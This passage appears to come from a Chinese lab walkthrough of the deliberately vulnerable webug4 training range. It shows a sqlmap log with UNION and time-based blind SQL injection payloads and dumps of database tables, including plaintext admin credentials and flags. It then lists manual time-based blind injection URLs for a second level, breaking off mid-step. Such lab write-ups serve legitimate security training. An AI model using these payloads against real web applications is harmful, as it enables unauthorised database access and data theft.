[22:40:39] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Firebird time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SAP MaxDB time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'IBM DB2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Informix time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:40:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:40:39] [PAYLOAD] 1' ORDER BY 1-- -
[22:40:40] [PAYLOAD] 1' ORDER BY 4935-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:41] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[22:40:42] [INFO] target URL appears to be UNION injectable with 2 columns
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x5561486f7454574e786b4857696c6e4453796c4a524b574d4c4c57596d455464437353424e667848,0x716a786a71)-- -
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x5561486f7454574e786b4857696c6e4453796c4a524b574d4c4c57596d455464437353424e667848,0x716a786a71) UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x757a645555565368454b57655278694241726e6e516a466872466b6f76575770726c6a425744694a,0x716a786a71)-- -
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x5561486f7454574e786b4857696c6e4453796c4a524b574d4c4c57596d455464437353424e667848,0x716a786a71) FROM (SELECT 0 AS sJVw UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS hWBR-- -
[22:40:42] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[22:40:42] [DEBUG] skipping test 'Generic UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'Generic UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'Generic UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'Generic UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'Generic UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'Generic UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'Generic UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 20 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] skipping test 'MySQL UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[22:40:42] [DEBUG] checking for parameter length constraining mechanisms
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,(CASE WHEN (4816= 4816) THEN 1 ELSE 0 END),0x716a786a71)-- -
[22:40:42] [DEBUG] performed 1 query in 0.07 seconds
[22:40:42] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[22:40:42] [DEBUG] used the default behavior, running in batch mode
sqlmap identified the following injection point(s) with a total of 79 HTTP(s) requests:
---
Parameter: id (GET)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1' AND (SELECT 8702 FROM (SELECT(SLEEP(5)))cfnu) AND 'cQKM'='cQKMVector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x5561486f7454574e786b4857696c6e4453796c4a524b574d4c4c57596d455464437353424e667848,0x716a786a71)-- -Vector: UNION ALL SELECT NULL,[QUERY]-- -
---
[22:40:42] [INFO] the back-end DBMS is MySQL
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x716a786a71)-- -
[22:40:42] [DEBUG] performed 1 query in 0.07 seconds
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x716a786a71)-- -
[22:40:42] [DEBUG] performed 1 query in 0.06 seconds
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x716a786a71)-- -
[22:40:42] [DEBUG] performed 1 query in 0.06 seconds
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x716a786a71)-- -
[22:40:42] [DEBUG] performed 1 query in 0.05 seconds
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716a786a71)-- -
[22:40:42] [DEBUG] turning off NATIONAL CHARACTER casting
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716a786a71)-- -
[22:40:42] [DEBUG] performed 2 queries in 0.12 seconds
web application technology: PHP 5.5.9, Apache 2.4.39
back-end DBMS: MySQL >= 5.0.12
[22:40:42] [INFO] fetching current database
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x716a786a71)-- -
[22:40:42] [DEBUG] performed 1 query in 0.07 seconds
current database: 'webug'
[22:40:42] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[22:40:42] [INFO] fetching current database
[22:40:42] [INFO] fetching tables for database: 'webug'
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,table_name)),0x716a786a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7765627567)-- -
[22:40:42] [DEBUG] performed 1 query in 0.05 seconds
[22:40:42] [INFO] fetching columns for table 'data_crud' in database 'webug'
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,column_name,column_type)),0x716a786a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x646174615f63727564 AND table_schema=0x7765627567-- -
[22:40:42] [DEBUG] performed 1 query in 0.07 seconds
[22:40:42] [INFO] fetching entries for table 'data_crud' in database 'webug'
[22:40:42] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,age,email,gender,id,name)),0x716a786a71) FROM webug.data_crud-- -
[22:40:42] [DEBUG] performed 1 query in 0.06 seconds
[22:40:42] [DEBUG] analyzing table dump for possible password hashes
Database: webug
Table: data_crud
[2 entries]
+----+-----+-------+----------------+--------+
| id | age | name | email | gender |
+----+-----+-------+----------------+--------+
| 1 | 20 | 1321a | wangai@163.com | 1 |
| 2 | 23 | 432 | null@163.com | 1 |
+----+-----+-------+----------------+--------+[22:40:42] [INFO] table 'webug.data_crud' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/webug/data_crud.csv'
[22:40:42] [INFO] fetching columns for table 'user' in database 'webug'
[22:40:42] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,column_name,column_type)),0x716a786a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x75736572 AND table_schema=0x7765627567-- -
[22:40:43] [DEBUG] performed 1 query in 0.05 seconds
[22:40:43] [INFO] fetching entries for table 'user' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,id,password,username)),0x716a786a71) FROM webug.`user`-- -
[22:40:43] [DEBUG] performed 1 query in 0.03 seconds
[22:40:43] [DEBUG] analyzing table dump for possible password hashes
Database: webug
Table: user
[1 entry]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | admin | admin |
+----+----------+----------+[22:40:43] [INFO] table 'webug.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/webug/user.csv'
[22:40:43] [INFO] fetching columns for table 'env_path' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,column_name,column_type)),0x716a786a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x656e765f70617468 AND table_schema=0x7765627567-- -
[22:40:43] [DEBUG] performed 1 query in 0.06 seconds
[22:40:43] [INFO] fetching entries for table 'env_path' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,`path`,delFlag,id,listId)),0x716a786a71) FROM webug.env_path-- -
[22:40:43] [DEBUG] performed 1 query in 0.03 seconds
[22:40:43] [DEBUG] analyzing table dump for possible password hashes
Database: webug
Table: env_path
[30 entries]
+----+--------+--------------------------------------------------------------+---------+
| id | listId | path | delFlag |
+----+--------+--------------------------------------------------------------+---------+
| 1 | 1 | ./sqlinject/manifest_error.php?id=1 | 0 |
| 2 | 2 | ./sqlinject/bool_injection.php?id=1 | 0 |
| 3 | 3 | ./sqlinject/bool_injection.php?id=1 | 0 |
| 4 | 4 | ./sqlinject/post_injection.php | 0 |
| 5 | 5 | ./sqlinject/filter_injection.php | 0 |
| 6 | 6 | ./sqlinject/width_byte_injection.php?id=1 | 0 |
| 7 | 7 | ./sqlinject/xxe_injection.php | 0 |
| 8 | 8 | ./sqlinject/csv_vuln.php | 0 |
| 9 | 9 | ./xss/xss_1.php?id=1 | 0 |
| 10 | 10 | ./xss/xss_2.php | 0 |
| 11 | 11 | ./sqlinject/universal_passwd.php | 0 |
| 12 | 12 | ./xss/dom_xss.php | 0 |
| 13 | 13 | ./xss/filter_xss.php?id=1 | 0 |
| 14 | 14 | ./xss/link_xss.php?id=1 | 0 |
| 15 | 15 | ./filedownload/file_download.php | 0 |
| 16 | 16 | ./filedownload/ini_file_download.php | 0 |
| 17 | 17 | ./upload_file/upload_file_1.php | 0 |
| 18 | 18 | ./upload_file/upload_file_2.php | 0 |
| 19 | 19 | ./upload_file/upload_file_3.php | 0 |
| 20 | 20 | ./upload_file/upload_file_4.php | 0 |
| 21 | 21 | ./upload_file/upload_file_5.php | 0 |
| 22 | 22 | ./auth_cross/cross_auth_passwd.php | 0 |
| 23 | 23 | ./auth_cross/cross_permission_pay.php | 0 |
| 24 | 24 | ./auth_cross/email.php | 0 |
| 25 | 25 | ./auth_cross/cross_find.php | 0 |
| 26 | 26 | ./more/url_redirect.php | 0 |
| 27 | 27 | ./more/file_include.php?filename=../../template/dom_xss.html | 0 |
| 28 | 28 | /tp5/public/index.php | 0 |
| 29 | 29 | ./more/webshell.php | 0 |
| 30 | 30 | ./more/ssrf.php?url=localhost/control/xss/xss_1.php?id=1 | 0 |
+----+--------+--------------------------------------------------------------+---------+[22:40:43] [INFO] table 'webug.env_path' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/webug/env_path.csv'
[22:40:43] [INFO] fetching columns for table 'sqlinjection' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,column_name,column_type)),0x716a786a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x73716c696e6a656374696f6e AND table_schema=0x7765627567-- -
[22:40:43] [DEBUG] performed 1 query in 0.06 seconds
[22:40:43] [INFO] fetching entries for table 'sqlinjection' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,content,id)),0x716a786a71) FROM webug.sqlinjection-- -
[22:40:43] [DEBUG] performed 1 query in 0.02 seconds
[22:40:43] [DEBUG] analyzing table dump for possible password hashes
Database: webug
Table: sqlinjection
[2 entries]
+----+----------------------------------------------------------------------------------------------------------------------------------------------+
| id | content |
+----+----------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | 站长下载()是中国最大的站长类资源下载网站,提供最新最全的源码和站长类工具下载,专设源码报导栏目提供权威的源码评测和教程,推荐国内外优秀源码。 |
| 2 | hello |
+----+----------------------------------------------------------------------------------------------------------------------------------------------+[22:40:43] [INFO] table 'webug.sqlinjection' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/webug/sqlinjection.csv'
[22:40:43] [INFO] fetching columns for table 'user_test' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,column_name,column_type)),0x716a786a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x757365725f74657374 AND table_schema=0x7765627567-- -
[22:40:43] [DEBUG] performed 1 query in 0.06 seconds
[22:40:43] [INFO] fetching entries for table 'user_test' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,id,password,username)),0x716a786a71) FROM webug.user_test-- -
[22:40:43] [DEBUG] performed 1 query in 0.07 seconds
[22:40:43] [DEBUG] analyzing table dump for possible password hashes
Database: webug
Table: user_test
[2 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | admin | admin |
| 2 | asdfsadf | aaaaa |
+----+----------+----------+[22:40:43] [INFO] table 'webug.user_test' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/webug/user_test.csv'
[22:40:43] [INFO] fetching columns for table 'env_list' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,column_name,column_type)),0x716a786a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x656e765f6c697374 AND table_schema=0x7765627567-- -
[22:40:43] [DEBUG] performed 1 query in 0.07 seconds
[22:40:43] [INFO] fetching entries for table 'env_list' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,`level`,delFlag,envDesc,envFlag,envIntegration,envName,id,type)),0x716a786a71) FROM webug.env_list-- -
[22:40:43] [DEBUG] performed 1 query in 0.05 seconds
[22:40:43] [DEBUG] analyzing table dump for possible password hashes
Database: webug
Table: env_list
[30 entries]
+----+---------+---------+---------+--------------------+-------------------+--------------------+----------------+
| id | type | level | delFlag | envDesc | envFlag | envName | envIntegration |
+----+---------+---------+---------+--------------------+-------------------+--------------------+----------------+
| 1 | 1 | 1 | 0 | 显错注入 | dfafdasfafdsadfa | 显错注入 | 3 |
| 2 | 1 | 1 | 0 | 布尔注入 | fdsafsdfa | 布尔注入 | 3 |
| 3 | 1 | 1 | 0 | 延时注入 | gfdgdfsdg | 延时注入 | 3 |
| 4 | 1 | 1 | 0 | post注入 | dsfasdczxcg | post注入 | 3 |
| 5 | 1 | 2 | 0 | 过滤注入 | safsafasdfasdf | 过滤注入 | 3 |
| 6 | 1 | 1 | 0 | 宽字节注入 | dfsadfsadfas | 宽字节注入 | 3 |
| 7 | 1 | 1 | 0 | xxe注入 | ddfasdfsafsadfsd | xxe注入 | 3 |
| 8 | 1 | 1 | 0 | csv注入 | <blank> | csv注入 | 3 |
| 9 | 2 | 1 | 0 | 反射型xss | fsdafasdfas | 反射型xss | 3 |
| 10 | 2 | 1 | 0 | 存储型xss | asdfsdfadfsdrew | 存储型xss | 3 |
| 11 | 1 | 1 | 0 | 万能密码登陆 | htryyujryfhyjtrjn | 万能密码登陆 | 3 |
| 12 | 2 | 1 | 0 | DOM型xss | uoijkhhnloh | DOM型xss | 3 |
| 13 | 2 | 1 | 0 | 过滤xss | poipjklkjppoi | 过滤xss | 3 |
| 2 | <blank> | 1 | 0 | 链接注入 | 3 | 14 | 链接注入 |
| 15 | 3 | 1 | 0 | 任意文件下载 | sadfvgsadfhe | 任意文件下载 | 3 |
| 16 | 3 | 1 | 0 | mysql配置文件下载 | poiplmkounipoj | mysql配置文件下载 | 3 |
| 17 | 4 | 1 | 0 | 文件上传(前端拦截) | sadfsadfsdadf | 文件上传(前端拦截) | 3 |
| 18 | 4 | 1 | 0 | 文件上传(解析漏洞) | sdfasdfgfddst | 文件上传(解析漏洞) | 3 |
| 19 | 4 | 1 | 0 | 文件上传(畸形文件) | vnghuytiuygui | 文件上传(畸形文件) | 3 |
| 20 | 4 | 1 | 0 | 文件上传(截断上传) | sadfhbvjyyiyukuyt | 文件上传(截断上传) | 3 |
| 21 | 4 | 1 | 0 | 文件上传(htaccess) | vbchjgwestruyi | 文件上传(htaccess) | 3 |
| 5 | <blank> | 1 | 0 | 越权修改密码 | 3 | 22 | 越权修改密码 |
| 5 | <blank> | 1 | 0 | 支付漏洞 | 3 | 23 | 支付漏洞 |
| 5 | <blank> | 1 | 0 | 邮箱轰炸 | 3 | 24 | 邮箱轰炸 |
| 5 | <blank> | 1 | 0 | 越权查看admin | 3 | 25 | 越权查看admin |
| 6 | <blank> | 1 | 0 | URL跳转 | 3 | 26 | URL跳转 |
| 6 | <blank> | 1 | 0 | 文件包含漏洞 | 3 | 27 | 文件包含漏洞 |
| 6 | <blank> | 1 | 0 | 命令执行 | 3 | 28 | 命令执行 |
| 6 | <blank> | 1 | 0 | webShell爆破 | 3 | 29 | webshell爆破 |
| 6 | <blank> | 1 | 0 | ssrf | 3 | 30 | ssrf |
+----+---------+---------+---------+--------------------+-------------------+--------------------+----------------+[22:40:43] [INFO] table 'webug.env_list' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/webug/env_list.csv'
[22:40:43] [INFO] fetching columns for table 'flag' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,column_name,column_type)),0x716a786a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x666c6167 AND table_schema=0x7765627567-- -
[22:40:43] [DEBUG] performed 1 query in 0.06 seconds
[22:40:43] [INFO] fetching entries for table 'flag' in database 'webug'
[22:40:43] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71767a7871,JSON_ARRAYAGG(CONCAT_WS(0x74686a70656d,flag,id)),0x716a786a71) FROM webug.flag-- -
[22:40:43] [DEBUG] performed 1 query in 0.05 seconds
[22:40:43] [DEBUG] analyzing table dump for possible password hashes
Database: webug
Table: flag
[1 entry]
+----+------------------+
| id | flag |
+----+------------------+
| 1 | dfafdasfafdsadfa |
+----+------------------+[22:40:43] [INFO] table 'webug.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.1/dump/webug/flag.csv'
[22:40:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.1'
[22:40:43] [WARNING] your sqlmap version is outdated[*] ending @ 22:40:43 /2022-11-29/
(4)获取flag
如下所示,该关卡的flag为fdsafsdfa
三、第03关 延时注入
1.打开靶场
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1
2.SQL手注
(1)盲注漏洞分析
由于SQL查询失败和SQL语句执行有误的打印信息相同,这部分存在时间盲注。
构造注入命令
id=1' and if(length(database())>1,sleep(3),1) %23注入语句如下所示
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1' and if(length(database())>1,sleep(3),1) %23如下响应时间大于3秒,存在注入漏洞
(2)获取数据库长度
判断数据库的长度的注入命令如下所示,
id=1' and if(length(database())=1,sleep(3),1)%23
id=1' and if(length(database())=2,sleep(3),1)%23
id=1' and if(length(database())=3,sleep(3),1)%23
id=1' and if(length(database())=4,sleep(3),1)%23
id=1' and if(length(database())=5,sleep(3),1)%23#成功如下所示,获取到数据库长度为5
(3)获取数据库名称
id=1' and if(substr((select database()),1,1)='w',sleep(5),1)%23
id=1' and if(substr((select database()),2,1)='e',sleep(5),1)%23
id=1' and if(substr((select database()),3,1)='b',sleep(5),1)%23
id=1' and if(substr((select database()),4,1)='u',sleep(5),1)%23
id=1' and if(substr((select database()),5,1)='g',sleep(5),1)%23如下所示,渗透获取数据库的名称为webug
(4)获取数据库中表名的数量
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=3,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=5,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=6,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=7,sleep(5),1)%23基于此,获取到共有7个表格
(5)获取当前数据库的表名长度
时间注入命令为
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=1,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=2,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=3,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=4,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=5,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=6,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=7,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=8,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=9,sleep(5),1)%23如下所示,第一个表格长度为9 
